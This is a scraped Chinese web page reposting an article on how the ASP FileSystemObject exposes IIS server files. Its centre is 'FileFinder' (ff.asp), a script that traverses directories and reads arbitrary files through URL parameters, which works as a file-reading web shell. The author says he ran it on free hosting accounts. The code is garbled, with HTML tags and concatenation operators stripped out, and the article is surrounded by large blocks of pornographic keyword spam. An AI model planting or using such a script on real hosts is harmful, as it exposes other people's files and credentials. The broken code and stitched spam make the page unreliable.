欧美阿v视频在线大全_亚洲欧美中文日韩V在线观看_www性欧美日韩欧美91_亚洲欧美日韩久久精品

主頁 > 知識庫 > ASP中FSO對象對IIS WEB服務器數據安全的威脅及對策

ASP中FSO對象對IIS WEB服務器數據安全的威脅及對策

熱門標簽:怎么在地圖標注自己 縣域地圖標注打印店 萊西電子地圖標注 個人可以辦理400電話么 外呼系統API接口 鳳臺百度地圖標注店 武夷山旅游地圖標注 修改地圖標注 金昌電話機器人價格
scripting.filesystemobject 對象是由 scrrun.dll 提供的許多供 vbscript/jscript 控制的 com 對象之一。scripting.filesystemobject 提供了非常便利的文本文件和文件目錄的訪問,但是同時也對 iis web 服務器數據安全造成了一定的威脅。

filefinder 的代碼很簡單,由3 個函數和 30 行左右的順序代碼構成。

最關鍵的是 findfiles 函數,通過對它的遞歸調用實現對某個目錄的遍歷,并且按照特定的文件擴展名來搜尋這些文件。


function findfiles(strstartfolder, strext)

dim n

dim othisfolder

dim ofolders

dim ofiles

dim ofolder

dim ofile


' 如果系統管理員對文件系統的權限進行細致的設置話,下面的代碼就要出錯

' 但是有些目錄還是可以察看的,所以我們簡單的把錯誤忽略過去

on error resume next

n = 0

response.write "b>searching " strstartfolder "/b>br>"

set othisfolder = g_fs.getfolder(strstartfolder)

set ofiles = othisfolder.files

for each ofile in ofiles

' 如果是指定的文件擴展名,輸出連接導向本身,但用不同的命令 cmd

' 在這里是 cmd=read,即讀出指定物理路徑的文本文件

if issuffix(ofile.path, strext) then

response.write "a target=_blank href='ff.asp?cmd=readpath=" server.htmlencode(ofile.path) "'>font color='dodgerblue'>" ofile.path "/font>/a>br>"

if err = 0 then

n = n + 1

end if

end if

next

set ofolders = othisfolder.subfolders

for each ofolder in ofolders

n = n + findfiles(ofolder.path, strext)

next

findfiles = n

end function

下面的代碼是對 url 后面的參數進行分析:


' 讀出各個參數的值

strcmd = ucase(request.querystring("cmd"))

strpath = request.querystring("path")

strext = request.querystring("ext")

brawdata = ucase(request.querystring("raw"))

' 默認搜索 .asp 文件

if strpath = "" then

strpath = "."

end if

if strext = "" then

strext = ".asp"

end if


' 根據不同的命令 cmd 執行不同的代碼

select case strcmd

case "find"

response.write findfiles(strpath, strext) " file(s) found"

case "read"

if brawdata = "t" then

response.write readtextfile(strpath)

else

response.write "pre>" server.htmlencode(readtextfile(strpath)) "/pre>"

end if

case else

response.write "h3>please specify a command to execute/h3>"

end select

從上面的分析可以看出,如果有足夠的權限的話,我們就可以通過 filefinder 來查找 iis web 服務器上的任意文本文件,并且可以輕松的察看文件內容。對于非文本文件,可以確定他們是否存在及其所在路徑,這對于高級 hacker 們來說,這些信息有時是極其重要的。

但是這些對數據安全的威脅的前提條件是執行 ff.asp 的用戶至少擁有讀取目錄和文件的權限。由于 windows nt server 在安裝后的默認安全設置是所有用戶都可以“讀取”目錄和文件,所以不管是 iis 默認的你名用戶 iusr_servername 還是別的什么用戶,都可以順列的讀取目錄和文件的信息。而大多數 windows nt server系統管理員主要關心系統是否能夠運行的起來,一般不愿意去改動默認的目錄和文件權限,畢竟那樣做要冒很大的風險,而且需要很多次得經驗。所以,我們可以用 filefinder 來檢查作為 web 服務器的 nt server 的文件系統的安全設置是否安全。

作者專門對作為 iis web 服務器的文件系統的權限進行了人工設置,但限于沒有經驗,導致了許多奇怪的錯誤現象,如:所用的做實驗的 nt server 4.0 不能進行 access 數據庫的連接。而在進行文件系統權限改動之前,這些功能是正常的。

本著純粹研究的目的,作者還在我所申請的免費 asp 空間上作了試驗(包括 csdn 提供的我的個人主頁),結果是 filefinder 都可以順利運行。而在http://www2.domaindlx.com/index.html 申請的個人主頁卻沒有這個問題,可見這個免費 asp 主頁提供商在這方面做的還是比較認真的。盡管 domaindlx 的 web 服務器運行在 windows 2000 server 上的,其默認的文件系統的安全權限和 nt 4.0 沒有很大的差別。

由于作者的能力有限,就對這個問題討論到這里。僅以此文來向國內的 asp 主頁提供商提供參考意見,希望能對提供商和客戶雙方的數據安全都有所幫助。

附:用其它類似的服務器端腳本來運行的 web 服務,如果也提供類似 scripting.filesystemobject 的對文件系統操作的功能,不管什么平臺應該存在同樣的問題。

標簽:楚雄 清遠 涼山 通遼 上海 赤峰 邢臺 南京

巨人網絡通訊聲明:本文標題《ASP中FSO對象對IIS WEB服務器數據安全的威脅及對策》,本文關鍵詞  ASP,中,FSO,對象,對,IIS,WEB,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《ASP中FSO對象對IIS WEB服務器數據安全的威脅及對策》相關的同類信息!
  • 本頁收集關于ASP中FSO對象對IIS WEB服務器數據安全的威脅及對策的相關信息資訊供網民參考!
  • 推薦文章
    欧美阿v视频在线大全_亚洲欧美中文日韩V在线观看_www性欧美日韩欧美91_亚洲欧美日韩久久精品
  • <rt id="w000q"><acronym id="w000q"></acronym></rt>
  • <abbr id="w000q"></abbr>
    <rt id="w000q"></rt>
    不卡的电影网站| 欧美日韩精品欧美日韩精品一| 欧美一级生活片| 香蕉乱码成人久久天堂爱免费| 99国产精品国产精品久久| 少妇aaaaa| 国产精品久久久久久户外露出 | 裸体一区二区三区| 国产精品一区二区入口九绯色| 欧美日韩一区二区在线视频| 亚洲一区二区美女| 岛国av免费观看| 51精品视频一区二区三区| 亚洲成人免费在线| 国产精品福利导航| 91精品国产麻豆| 蜜臀av性久久久久蜜臀aⅴ| 偷拍夫妻性生活| 2020国产成人综合网| 久久电影网站中文字幕| 少妇视频在线播放| 国产精品久久久久久久久图文区 | 欧美丰满少妇xxxxx高潮对白| 一区二区三区欧美日| 成年人看片网站| 欧美一区日韩一区| 日韩av在线免费观看不卡| 一区二区精品免费| 国产午夜精品一区二区三区视频| 国产福利一区二区| 天天综合天天做| 亚洲午夜一二三区视频| 中文字幕 日本| 久久一区二区三区四区| 国产成人av电影在线观看| 特级片在线观看| 亚洲一区二区成人在线观看| 中文文字幕文字幕高清| 久久精品免视看| 99re这里只有精品首页| 欧美日韩大陆在线| 秋霞电影一区二区| 国产精品69久久久久孕妇欧美| 国产精品电影院| 亚洲成人福利视频| 日韩女同互慰一区二区| 国产精品一区二区免费不卡| 色av一区二区| 视频一区国产视频| 熟女俱乐部一区二区| 国产精品视频一二三区| 午夜福利三级理论电影| 精品国产一区二区三区四区四 | 日韩一区二区电影| 国产精品一区专区| 在线观看一区日韩| 蜜臀a∨国产成人精品| 日韩在线观看视频一区二区| 午夜精品免费在线| 欧美日韩色视频| 午夜视频一区在线观看| 青青草自拍偷拍| 亚洲一区国产视频| 微拍福利一区二区| 亚洲欧美日韩电影| 在线观看福利片| 亚洲欧美激情小说另类| 大又大又粗又硬又爽少妇毛片| 中文字幕亚洲电影| 在线免费看黄视频| 一区二区三区四区中文字幕| 久久久久无码精品国产sm果冻| 亚洲精品综合在线| 先锋影音av在线| 亚洲丰满少妇videoshd| 男人av资源站| 人人爽香蕉精品| 91国偷自产一区二区使用方法| 免费观看日韩av| 欧美自拍偷拍午夜视频| 国产资源在线一区| 3atv在线一区二区三区| 99视频热这里只有精品免费| 26uuu精品一区二区在线观看| xxxx国产视频| 中文字幕国产一区二区| 国产中文字幕一区二区| 亚洲黄色片在线观看| 91香蕉视频污在线观看| 日本少妇一区二区| 欧美性做爰猛烈叫床潮| 粉嫩嫩av羞羞动漫久久久| 精品嫩草影院久久| 在线免费看黄色片| 有码一区二区三区| 久久高清内射无套| 国产最新精品免费| 精品嫩草影院久久| 亚洲精品乱码久久久久久久| 亚洲制服丝袜一区| 色综合久久88色综合天天 | 国产精品白丝喷水在线观看| 麻豆国产精品一区二区三区| 在线不卡一区二区| 黑人无套内谢中国美女| 亚洲欧美另类综合偷拍| 91麻豆精品成人一区二区| 国内精品视频一区二区三区八戒 | 91碰在线视频| 亚洲欧洲av色图| www.99re6| 国产麻豆精品一区二区| 精品久久久久av影院| 五级黄高潮片90分钟视频| 午夜私人影院久久久久| 欧美日本一道本在线视频| 成年人性生活视频| 亚洲综合丝袜美腿| 欧美日韩中文另类| 久久精品无码一区二区三区毛片| 亚洲欧美日韩电影| 在线看国产日韩| 91原创在线视频| 亚洲日本一区二区| 色婷婷亚洲一区二区三区| aaa亚洲精品一二三区| 亚洲欧美日韩国产综合在线| 男人操女人的视频网站| av一区二区三区黑人| √…a在线天堂一区| 色成人在线视频| 91丨porny丨在线| 夜夜揉揉日日人人青青一国产精品| 欧美综合视频在线观看| 久久久久无码国产精品一区李宗瑞| 亚洲一区二区三区中文字幕在线| 欧美性猛片xxxx免费看久爱| 国产人妻精品午夜福利免费| 亚洲一区二区三区视频在线| 欧美蜜桃一区二区三区| 国产夫妻性爱视频| 精品一区二区三区久久| 亚洲国产精品成人综合| 一本大道久久a久久综合| 欧美一区二区三区影院| 亚洲福利视频导航| 精品三级av在线| 波多野结衣家庭教师在线观看| 国产高清亚洲一区| 《视频一区视频二区| 欧美日韩成人一区二区| 国产亚洲无码精品| 国产精品99久久久久久久vr| 亚洲欧洲日韩一区二区三区| 欧美午夜影院一区| 三叶草欧洲码在线| 国产精品69毛片高清亚洲| 亚洲日本青草视频在线怡红院| 欧美日产在线观看| 蜜桃久久精品成人无码av| 成人毛片老司机大片| 亚洲午夜激情网页| 精品欧美乱码久久久久久 | 中文字幕乱码在线人视频| 天天av天天翘天天综合网色鬼国产| 日韩女同互慰一区二区| 国产麻豆视频在线观看| 色哟哟网站在线观看| 美日韩一区二区| 国产精品久久久久久久久免费桃花| 欧美日韩激情一区| 91成人在线免费视频| av不卡在线观看| 免费观看成人鲁鲁鲁鲁鲁视频| 欧美激情一区二区三区在线| 欧美日韩精品综合在线| 99精品欧美一区二区| 97精品久久久午夜一区二区三区| 丝袜亚洲精品中文字幕一区| 国产精品天美传媒沈樵| 欧美日韩电影在线| 黄色一级片一级片| 国产乱国产乱老熟300部视频| 国产真实乱对白精彩久久| 一区二区成人在线视频| 久久综合色一综合色88| 在线日韩av片| 免费网站在线高清观看| 久久av一区二区三| 国产精品一区专区| 日日夜夜一区二区| 亚洲少妇最新在线视频| 337p粉嫩大胆色噜噜噜噜亚洲| 欧美性欧美巨大黑白大战| 长河落日免费高清观看| 四季av综合网站| bt欧美亚洲午夜电影天堂| 久久国产免费看| 亚洲一二三四区不卡| 亚洲国产成人自拍|